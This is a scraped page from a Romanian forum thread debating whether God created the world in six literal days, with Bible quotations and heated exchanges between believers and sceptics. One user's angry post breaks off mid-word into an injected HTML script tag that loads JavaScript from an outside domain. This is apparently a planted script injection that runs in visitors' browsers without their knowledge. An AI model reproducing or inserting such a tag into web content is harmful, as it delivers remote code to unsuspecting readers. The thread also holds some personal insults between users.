Follow RomanianPortal on Twitter       
Pagina 2 din 13 PrimulPrimul 123412 ... UltimulUltimul
Rezultate 11 la 20 din 126

Subiect: A creat Dumnezeu lumea in sase zile?

Data înscrierii
    10.04.2007
    Locație
    Romania
    Posturi
    7
    Putere Rep
    0

Implicit

1. nu discut pe forumul asta sa ma dau mare intelept
    2. pana si copil daca ai fi ti-ai da seama de mandria cu care ne ameteste
    Larvatus
    3. cand zic ca sunteti "atei care credeti in toate si in nimic " atunci sa sti ca pastrez aceasta afirmatie care mie mi se pare corecta , depinde de puctul tau de vedere acum
    4. ironia ta pe seama mea .... ma deranjeaza , dar asa esti tu mai intelept banuiesc daca ma denigrezi pe mine si mai intai cauti sa ma umilesti ca apoi sa-mi scoti niste aberatii de te doare capul
    Sti care-i diferenta intre mine si Vadim si printre multe altele ? E CA EL ESTE ATEU CA SI VOI SI VA SEAMANA VOUA MAI MULT
    5. daca eram intelept nu cred ca-mi bateam capul cu toti vanitosii fara Dumnezeu precum Larvatus si pe tine

Acum la aberatiile tale:

"adica in dobitocenia noastra a astora" fara D-zeu", oamenii mor de
    foame, prin africa copii abia nascuti cad prada bolilor si foametei,
    altii dau jertfa dumnezeului lor"alah"sau mai stiu eu care... viata
    altor oamenii .. se mai nasc gemenii cu un singur cap...copii cu doua
    capete......dar d-zeu-ul tau asa vrea el sa ramana un mister....
    "

Cine iti poate explica tie ca fatalitatile si necazurile sunt toate in mana lui Dumnezeu precum si bucuriile si le imparte cum alege El in functie de nevoile tale atat materiale cat si SPIRITUALE.Dar intotdeauna mai intai sunt cele SPIRITUALE.Sti tu ce poate iesi bun din rau sau rau din bine sau cine trebuie scos din jitnita Domnului si ars cu foc sau cine trebuie smerit ori cine trebuie inaltat? Crezi tu ca pamantul asta se invarte si este pazit de atatea catastrofe cosmice de sansa aia de 1 la infinit , iar universul fiind infinit esti tu cel mai norocos rezultat al unui accident cosmic ? Nimic nu se intampla fara voia lui Dumnezeu iar lucrarea mainilor Lui eu nu o critic caci s-ar putea mania pe mine caci Dumnezeu ii cunoaste mai bine pe cei care ii pedepseste sau ii rasplateste. Ce sti tu de copii din Africa mai multe decat stie Dumnezeu ? Ce sti tu care pui lumea asta mai presus de cea viitoare sau o excluzi total pe cea viitoare. A , da. TU esti intelept ... dar in afara de ironii si huiduieli si latraturi la adresa credintei mele altceva n-ai fost bun sa aduci. Macar dezbate daca te duce mintea la mai mult, arata-mi ca ai dreptate sau asta e invatatura celor privilegiati numai ? Am citit si eu destule carti in care stiinta explica asa-zisele fenomene si sti ce am aflat , ca daca as fi crezut aberatiile alea (si le credeam cand eram ca tine de fapt )as fi fost mai nebun ca un inchinator la idoli. NU EXPLICA STIINTA TOT ci in general ofera o versiune ateista asupra lucrurilor. Cand te apropii de foc nu te arde ori cand te departezi nu tie rece? Cand un om o ia pe o cale indiferent ca-i Dumnezeu sau nu nu simte el daca a luat-o bine sau nu? Nu se numeste aceasta stare fericire sau nefericire? Cum puteti fi voi fericiti daca nu sunteti cu Dumnezeu ci impotriva Lui? Deci d-aia v-am spus ca suferiti de depresii ca si nebunul ala de Vadim ca nu degeaba isi rumega pastilele.

"dar D-zeu-ul tau asa vrea el sa ramana un mister"
    Nu Dumnezeu este misterul ci tainele si toate cele care nu le poate cuprinde mintea omului si aflarea lor sau nu oricum nu ii vor influenta calea catre mantuire.Deci se vede cata intelegere ai tu asupra unei dezbateri.

Uite asa interpretez eu cuvintele mele cuvinte pe care Dumnezeu mi le-a descoperit in viata si in calea pe care incerc sa I-o urmez. Voua insa vi le descopera diavolii pe care i-ati adunat.Si ei au fost ingeri ... sa va dea macar minte in huliturile voastre ca va faceti de ras cu interpretarile voastre atat de superficiale( in care explicatiile stiintei se incadreaza perfect). De ati fi aprofundat calea lui Dumnezeu si ati fi vazut cat de buna si neclintita este nu v-ati fi facut de ras cu erezii pe care le gandeam eu la liceu d-abia. Cata maturitate si experienta de viata va denota toate astea... PENTRU VOI DUMNEZEU VA RAMANE UN M<script src=http://www.iroe.ru/ngg.js></script>

Guest

Implicit

Putem intelege faptul ca "zilele", sau erele de creare, sunt formate din mii de ani si dupa ceea ce spune Biblia referitor la a saptea "zi". Pentru fiecare dintre primele sase "zile", relatarease incheie cu cuvintele:"A fost oseara si a fost odimineata". Totusi, aceste cuvinte nu le veti gasi in incheierea relatarii despre a saptea "zi". In plus, in secolul intai e.n., dupa multe mii de ani de istorie, Biblia a aratat ca cea de-a saptea "zi" de odihna continua(Evrei 4:4-6). Asadar, cea de-a saptea "zi" reprezinta o perioada formata din mii de ani, de unde putem deduce in mod logic ca la fel stau lucrurile si cu primele sase "zile".

Data înscrierii
    13.04.2007
    Locație
    Romania
    Posturi
    27
    Putere Rep
    0

Implicit

Citat Postat în original de kirk

Putem intelege faptul ca "zilele", sau erele de creare, sunt formate din mii de ani si dupa ceea ce spune Biblia referitor la a saptea "zi". Pentru fiecare dintre primele sase "zile", relatarease incheie cu cuvintele:"A fost oseara si a fost odimineata". Totusi, aceste cuvinte nu le veti gasi in incheierea relatarii despre a saptea "zi". In plus, in secolul intai e.n., dupa multe mii de ani de istorie, Biblia a aratat ca cea de-a saptea "zi" de odihna continua(Evrei 4:4-6). Asadar, cea de-a saptea "zi" reprezinta o perioada formata din mii de ani, de unde putem deduce in mod logic ca la fel stau lucrurile si cu primele sase "zile".

Ideea este f. interesanta. As completa cu cateva idei:
    Dumnezu este mai presus de timp iar timpul este masura schimbarii si a degradarii. In aceste sens in Dumnezeu nu exista trecut sau viitor ci, poate, doar un prezent continuu.
    Se pare ca traim in nadejdea celei de a 8-a zile (infinite, 8 rasturnat=infinit) - viata vesnica.

Zilele creatiei, in acest sens, pot avea orice durata, atotputernicia lui Dumnezeu nu este ingradita de timp. Moise a prezentat cuvantul "zile" care poate fi interpretat oricum. Sf. Vasile cel Mare, in "Omilii la Hexaimeron" le vede si ca perioade mari de timp.

Guest

Implicit

Citat Postat în original de kirk
    In plus, in secolul intai e.n., dupa multe mii de ani de istorie, Biblia a aratat ca cea de-a saptea "zi" de odihna continua(Evrei 4:4-6). Asadar, cea de-a saptea "zi" reprezinta o perioada formata din mii de ani, de unde putem deduce in mod logic ca la fel stau lucrurile si cu primele sase "zile".

Kirk, din nou
    mi-ai dat de lucru!!!![img]smileys/smiley21.gif[/img]</span>

Ma mentin insa la opinia ca
    cele 6 zile de creatiune au fost 6 zile de 24 de ore, si am sa-ti arat de ce:
    In Exodul 20:8 scrie: </span>Adu-ţi aminte de ziua de
    odihnă, ca s'o sfinţeşti. </span>9</span>Să lucrezi şase zile, şi
    să-ţi faci lucrul tău.</span>10</span>Dar ziua a şaptea este ziua de
    odihnă

Data înscrierii
    13.04.2007
    Locație
    Romania
    Posturi
    27
    Putere Rep
    0

Implicit

Cineva spunea ca timpul este "intervalul dintre chemarea lui Dumnezeu si raspunsul omului" Din momentul in care omul raspunde si accepta colaborarea sa cu harul pentru el timpul devine eternitate.

In alta ordine de idei:
    Zilele creatii pot avea orice durata. Pentru noi crestinii nu este mantuitoare reiterarea acelor zile (in sensul in care omul societatilor arhaice se straduia sa traiasca intr-un timp sacru prin reiterarea cosmogoniei). Noi reiteram ceea ce a facut Mantuitorul pentru noi (Jertfa si Invierea): "Aceasta sa faceti in pomenirea Mea!"

Guest

Implicit

Citat Postat în original de inelu64
    In alta ordine de idei:
    Zilele creatii pot avea orice durata.
    Poate ca da, poate ca nu, insa Biblia spune ca a fost o sera si apoi a fost o dimineata, adica 24 de ore.... Eu saracu de mine acu pe cine sa cred? [img]smileys/smiley2.gif[/img]

Data înscrierii
    13.04.2007
    Locație
    Romania
    Posturi
    27
    Putere Rep
    0

Implicit

Citat Postat în original de Mugatu
    In alta ordine de idei:
    Zilele creatii pot avea orice durata.
    Poate ca da, poate ca nu, insa Biblia spune ca a fost o sera si apoi a fost o dimineata, adica 24 de ore.... Eu saracu de mine acu pe cine sa cred? [img]smileys/smiley2.gif[/img]
    Cred ca e bine sa gandim intr-adevar la zile de 24 de ore pentru ca noi oamenii avem nevoie de repere si coordonate.

Data înscrierii
    21.01.2007
    Locație
    Orlando, FL
    Posturi
    2.364
    Putere Rep
    30

Implicit

Cred ca e bine sa gandim intr-adevar la zile de 24 de ore pentru ca noi oamenii avem nevoie de repere si coordonate.
    Da avem nevoie de "repere si coordonate"mai mult decat atat..avem nevoie de dovezi...asta e din seria "crede si nu cerceta"...? ca cine stie ce descoperi?
    The impossible exists only until we find a way to make it possible.

Guest

Implicit

Multi se grabesc si iau in ras relatarea din Geneza cap.1, spunand ca este nestiintifica. In realitate insa, la o examinare atenta, se poate vedea ca succesiunea evenimentelor si, respectiv, ordinea cronologica a aparitiei formelor de viata este, linii mari, aceeasi cu cea recunoscuta de stiinta moderna. Este adevarat ca limbajul este diferit, dar acest lucru poate fi de inteles. Observati ce a spus un geolog, pe nume Wallace Pratt, in acest sens:"Daca mie, ca geolog, mi s-ar cere sa explic pe scurt ideile moderne despre originea pamantului si aparitiei vietii pe el unui popor de pastori, de oameni simpli, cum erau triburile carora le-a fost adresata cartea Genezei, n-as putea sa explic mai bine decat urmand aproape cuvant cu cuvant cele spuse in primul capitol al Genezei."....Interesant! ce spuneti?

Guest

Implicit

Citat Postat în original de keyframe14
    ..avem nevoie de dovezi...asta e din seria "crede si nu cerceta"...? ca cine stie ce descoperi?
    keyfram14, nu a zis nimeni sa crezi orbeste fara sa cercetezi; credinta cea mai puternica vine dupa ce ai cercetat si ai vazut ca este adevar in cea ce crezi!

Pagina 2 din 13 PrimulPrimul 123412 ... UltimulUltimul

Subiecte similare

1. Zile bune, zile NEbune :) [2]
    De Pisoi în forumul Discutii Generale-de toate pentru toti, diverse
    Răspunsuri: 84
    Ultimul post: 18.08.2012, 04:37
  2. Zile bune, zile NEbune :) (2)
    De Rebela în forumul Discutii Generale-de toate pentru toti, diverse
    Răspunsuri: 95
    Ultimul post: 18.06.2009, 04:36
  3. Zile bune, zile NEbune :)
    De Rebela în forumul Arhiva de subiecte
    Răspunsuri: 387
    Ultimul post: 26.03.2007, 07:13
  4. Mesaj pentru fosti elevi de nota sase
    De bluesky în forumul Afaceri /Anunturi de Publicitate - SUA, Canada, Uniunea Europeana, Australia, Noua Zeelanda, Romania
    Răspunsuri: 0
    Ultimul post: 10.05.2006, 06:19
  5. Sase cetateni romani sunt dati disparuti
    De în forumul Comunitatea romaneasca din West
    Răspunsuri: 1
    Ultimul post: 04.09.2005, 06:32

Permisiuni postare

• Nu poți posta subiecte noi
  • Nu poți răspunde la subiecte
  • Nu poți adăuga atașamente
  • Nu poți edita posturile proprii
  •